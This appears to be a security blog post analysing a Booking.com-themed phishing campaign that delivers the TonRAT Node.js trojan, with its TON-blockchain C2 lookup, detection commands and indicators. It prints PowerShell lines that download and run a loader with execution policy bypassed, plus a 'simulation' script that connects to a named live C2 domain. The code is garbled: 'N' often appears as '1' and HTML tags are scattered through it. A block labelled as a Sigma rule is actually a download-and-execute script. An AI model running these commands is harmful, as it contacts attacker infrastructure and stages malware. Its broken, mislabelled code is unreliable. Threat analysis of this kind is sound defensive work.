Hotel Booking Phishing Delivers TonRAT via Nodejs and TON Blockchain C2 — A Multi-Stage Cyberattack Analysis + Video

By /

Listen to this Post

Featured Image

Introduction

A sophisticated multi-stage malware campaign observed between May and June 2026 has been targeting hotel operating companies with emails impersonating Booking.com. The campaign leverages legitimate services including Calendly and SendGrid to bypass email filters, combined with a PowerShell-based infection chain that delivers a Node.js remote access trojan known as TonRAT. What sets this campaign apart is its use of The Open Network (TON) blockchain API to dynamically obtain command-and-control domains, making traditional domain-based blocking significantly less reliable.

Learning Objectives

  • Understand the complete multi-stage infection chain from phishing email to TonRAT execution
  • Analyze how attackers abuse legitimate services (Calendly, SendGrid, Node.js official distribution) to evade detection
  • Learn detection and mitigation strategies for Node.js-based malware with blockchain-powered C2 infrastructure

You Should Know

  1. The Infection Chain: From Booking.com Impersonation to TonRAT Deployment

The attack begins with a convincing phishing email that impersonates Booking.com. The emails are sent through Calendly and SendGrid infrastructure, with the sender display name spoofing Booking.com while the actual sender is a Calendly notification address. The Reply-To field points to suspicious external addresses, providing an additional layer of deception.

Step‑by‑step infection flow:

  1. Phishing Email: Hotel staff receive an email claiming to be related to guest feedback — specifically, complaints about bed bugs found in a hotel room. The email contains a shortened link.

  2. Initial Download: Clicking the link downloads a ZIP archive containing an LNK file and a dummy MP4 file. The MP4 file serves only as camouflage.

  3. LNK Execution: When the user opens the LNK file, a PowerShell command executes. This command uses `Invoke-WebRequest` to download an additional PowerShell script from a hardcoded malicious domain (photo-26654[.]cfd).

  4. Payload Decryption: The downloaded PowerShell script (LE3f0MRT.ps1) contains an AES-encrypted JavaScript file. It decrypts this payload using the following credentials:

– AES Key (base64): `XuvxxbC6FTvygXIM6fkrzax9VMkZizAPEc1pB3GJmA4=`
– IV (base64): `3sqOzCNaHrLIQxwgJvClww==`

5. Node.js Runtime Download: The PowerShell script downloads the legitimate Node.js runtime from the official Node.js distribution site:

https://nodejs.org/dist/v24.13.0/node-v24.13.0-win-x64.zip

The runtime is extracted to `%localappdata%\Nodejs`.

  1. TonRAT Execution: The decrypted JavaScript file (TonRAT) is executed using the downloaded node.exe. The JavaScript uses Node.js libraries and cannot run with standard Windows script hosts like `cscript.exe` or wscript.exe.

PowerShell commands observed in the attack:

 Initial download of the loader
powershell -1oProfile -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri http://malicious.example.com/tonrat.ps1 -OutFile $env:TEMP\tonrat.ps1"

Execution of the loader
powershell -1oProfile -ExecutionPolicy Bypass -File $env:TEMP\tonrat.ps1

Node.js payload execution
C:\Program Files\nodejs\node.exe C:\Temp\malicious.js

2. TonRAT’s TON Blockchain C2 Infrastructure

One of the most sophisticated aspects of TonRAT is its use of the TON blockchain API for command-and-control infrastructure discovery.

Step‑by‑step C2 communication:

  1. TON Account ID: TonRAT contains a hardcoded TON account ID that serves as a lookup key.

  2. API Query: The malware queries the `tonapi.io` service to resolve its C2 infrastructure. This appears as legitimate API traffic to `https://tonapi.io/v2/blockchain/accounts/{account_id}`.

  3. Domain Retrieval: The TON API returns the current C2 domain associated with the account ID. This allows attackers to change C2 domains dynamically without updating the malware.

  4. WebSocket Connection: Once the domain is obtained, TonRAT initiates a WebSocket handshake (wss://) to the resolved malicious domain. Observed domains include zloapobikahy23.bond.

  5. Persistent C2 Channel: The WebSocket connection establishes a persistent bidirectional channel for command execution and data exfiltration.

Simulation script for detecting this behavior:

 Step 1: Simulate TON API interaction
Write-Host "[+] Simulating interaction with tonapi.io..."
$api_url = "https://tonapi.io/v2/blockchain/accounts/EQ..."
Invoke-WebRequest -Uri $api_url -Method Get -UseBasicParsing

Step 2: Simulate WebSocket connection to malicious C2
Write-Host "[+] Simulating WebSocket connection to malicious domain..."
$c2_url = "wss://zloapobikahy23.bond/control"
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$cts = New-Object System.Threading.CancellationTokenSource
$uri = New-Object System.Uri($c2_url)
$task = $ws.ConnectAsync($uri, $cts.Token)
  1. Abusing Trusted Services: Calendly, SendGrid, and Google Short URLs

The attackers demonstrate advanced tradecraft by leveraging legitimate third-party services throughout the attack chain.

Calendly/SendGrid Abuse:

  • Emails are routed through Calendly’s notification infrastructure, making them appear legitimate
  • SendGrid’s trusted IP reputation helps bypass SPF, DKIM, and DMARC checks
  • The sender display name spoofs Booking.com, but the actual envelope sender is a Calendly address

Google Short URLs:

  • The campaign uses Google URL shorteners to obfuscate the true destination
  • Shortened links bypass many URL filtering solutions that would otherwise flag suspicious domains

Node.js Official Distribution:

  • By downloading `node.exe` from the official `nodejs.org` domain, the malware avoids detection by allowlisting solutions
  • The legitimate binary is used to execute malicious JavaScript, making behavioral detection more challenging

Detection commands for identifying this abuse:

 Check for unexpected Node.js execution
Get-Process -1ame node -ErrorAction SilentlyContinue | 
Where-Object { $<em>.Path -like "\AppData\" -or $</em>.Path -like "\Temp\" }

Check for PowerShell downloads from suspicious domains
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | 
Where-Object { $<em>.Message -match "Invoke-WebRequest" -and $</em>.Message -match "http" }

Check for Calendly-originated emails in mail logs (Exchange Online)
Search-MailboxAuditLog -Identity  -Operations SendAs, SendOnBehalf -StartDate (Get-Date).AddDays(-30) | 
Where-Object { $_.ClientInfoString -match "Calendly" }

4. Detection and Mitigation Strategies

Security teams should implement the following detection and mitigation measures:

Email Filtering Enhancements:

  • Block suspicious Calendly short links and validate sender domains carefully
  • Configure alerts for email flows using SendGrid headers from untrusted sources
  • Implement strict DMARC policies to detect spoofed display names

Endpoint Detection:

  • Restrict PowerShell execution to signed scripts only where possible
  • Monitor for unauthorized Node.js runtime (node.exe) appearing in unusual locations (e.g., %localappdata%, %TEMP%)
  • Alert on `node.exe` executed with JavaScript files from temporary directories

Network Monitoring:

  • Watch for connections to TON API endpoints including `tonapi.io`
    – Detect WebSocket traffic (wss://) to newly registered or suspicious domains
  • Monitor for DNS queries to domains resolved via blockchain APIs

Sigma Rule Detection Example:

 TonRAT Deployment Simulation — triggers detection
$tempDir = "$env:TEMP\tonrat_demo"
New-Item -ItemType Directory -Path $tempDir -Force | Out-1ull

<ol>
<li>Download fake loader
$loaderUrl = "http://malicious.example.com/tonrat.ps1"
$loaderPath = "$tempDir\tonrat.ps1"
Invoke-WebRequest -Uri $loaderUrl -OutFile $loaderPath -UseBasicParsing</p></li>
<li><p>Execute the loader
powershell -1oProfile -ExecutionPolicy Bypass -File $loaderPath

Windows Registry Persistence Checks:

 Check for suspicious Run keys
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue

Check for scheduled tasks related to Node.js
Get-ScheduledTask | Where-Object { $_.Actions -match "node.exe" }

5. Incident Response Procedures

If TonRAT infection is suspected, follow this response framework:

Immediate Actions:

  1. Isolate the affected endpoint immediately to prevent additional C2 traffic and data exfiltration
  2. Capture memory and disk images for forensic analysis
  3. Block the identified C2 domains at the network perimeter

Forensic Investigation:

  1. Review PowerShell operational logs for unauthorized `node.exe` activity
  2. Perform a forensic sweep for known TonRAT JavaScript hashes
  3. Investigate any connections to the identified C2 infrastructure
  4. Check for the presence of `%localappdata%\Nodejs` directory containing `node.exe` and JavaScript payloads

Persistence Removal:

 Remove suspicious Node.js installations
Remove-Item -Path "%localappdata%\Nodejs" -Recurse -Force -ErrorAction SilentlyContinue

Clear suspicious Run keys
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -1ame "NodeUpdate" -ErrorAction SilentlyContinue

Delete malicious scheduled tasks
Unregister-ScheduledTask -TaskName "tonrat" -Confirm:$false

6. Indicators of Compromise (IoC)

File Hashes:

  • ZIP archive hashes (refer to ITOCHU’s Appendix for complete list)
  • LNK file hashes
  • PowerShell script hashes (LE3f0MRT.ps1)
  • TonRAT JavaScript payload hashes

Network Indicators:

– `photo-26654[.]cfd` — PowerShell download domain
– `zloapobikahy23[.]bond` — WebSocket C2 domain
– `tonapi.io` — TON blockchain API (legitimate but abused)
– `nodejs.org/dist/v24.13.0/` — legitimate Node.js download (abused)

File Paths:

– `%localappdata%\Nodejs\` — Node.js runtime installation
– `%localappdata%\Nodejs\node.exe` — executed Node.js binary
– `%TEMP%\.js` — decrypted TonRAT payloads

What Undercode Say

  • Key Takeaway 1: The TonRAT campaign represents a significant evolution in malware tradecraft, combining legitimate service abuse (Calendly, SendGrid, Node.js official distribution) with blockchain-based C2 infrastructure that makes takedown efforts substantially more difficult.

  • Key Takeaway 2: Traditional domain-based blocking and signature-based detection are insufficient against this threat. Organizations must implement behavioral detection for unauthorized Node.js execution, monitor TON API traffic, and develop threat hunting capabilities for WebSocket-based C2 channels.

Analysis

The TonRAT campaign demonstrates how attackers are increasingly adopting techniques that blur the line between legitimate and malicious activity. By downloading Node.js from the official distribution site and using the TON blockchain API for C2 domain resolution, the malware operates with a high degree of legitimacy that evades many security controls. The abuse of Calendly and SendGrid infrastructure highlights the growing challenge of email security — even well-configured email filters can be bypassed when attackers leverage trusted third-party senders.

The multi-stage infection chain, while complex, shows careful engineering: each stage is designed to be as innocuous as possible. The LNK file with embedded PowerShell, the use of AES encryption for the JavaScript payload, and the legitimate Node.js runtime all contribute to evasion. The WebSocket-based C2 communication over `wss://` provides encrypted, bidirectional communication that blends with normal HTTPS traffic.

This campaign underscores the importance of defense-in-depth strategies that go beyond perimeter security. Endpoint detection and response (EDR) solutions must be configured to detect unusual process behaviors — such as `node.exe` running from non-standard locations — rather than relying solely on known malware signatures. Security teams should also develop threat hunting queries specifically for WebSocket connections to newly registered domains and for PowerShell scripts that download and execute Node.js binaries.

Prediction

  • +1 The adoption of blockchain technology for C2 infrastructure will accelerate as more threat actors recognize the resilience and takedown resistance it provides. Expect to see similar techniques using Ethereum, Solana, and other blockchain networks for command-and-control in 2026-2027.

  • -1 The use of legitimate services like Calendly and SendGrid for phishing will force email security vendors to develop more sophisticated behavioral analysis capabilities, but this will create a cat-and-mouse game where attackers continuously shift to newly trusted services.

  • -1 Small and medium-sized hospitality organizations, which often lack dedicated security teams, remain highly vulnerable to these sophisticated campaigns. Expect increased targeting of the hospitality sector as attackers refine their social engineering lures around guest feedback and booking workflows.

  • +1 The security community will develop new detection frameworks specifically for Node.js-based malware, incorporating YARA rules for JavaScript obfuscation patterns and behavioral analytics for unexpected Node.js process executions.

  • -1 As defenders improve detection, attackers will likely add additional evasion layers — potentially including fileless execution, reflective loading of Node.js, or integration with legitimate cloud services for C2 traffic masking.

  • +1 Collaboration between threat intelligence sharing platforms and blockchain analytics firms will improve, enabling faster identification and blocking of TON-based C2 domains through partnerships with blockchain explorers and API providers.

  • -1 The sophistication of this campaign suggests a well-resourced threat actor with significant development capabilities. Similar attacks targeting other industries with business-to-consumer communication workflows (e.g., airlines, travel agencies, e-commerce) are likely to emerge.

  • +1 Organizations that implement comprehensive PowerShell logging, application whitelisting for Node.js, and network monitoring for WebSocket traffic will be better positioned to detect and respond to these threats before significant data exfiltration occurs.

  • -1 The use of legitimate Node.js runtime from official sources means traditional application control solutions that allowlist `node.exe` based on publisher certificates will not block execution, forcing a shift toward behavioral allowlisting approaches.

  • +1 The cybersecurity industry will develop specialized training courses focusing on blockchain-based threat intelligence and Node.js malware analysis, equipping analysts with the skills needed to combat evolving threats like TonRAT.

▶️ Related Video (76% Match):

https://www.youtube.com/watch?v=3pZRK6w9V00

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Flavioqueiroz Tonrat – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: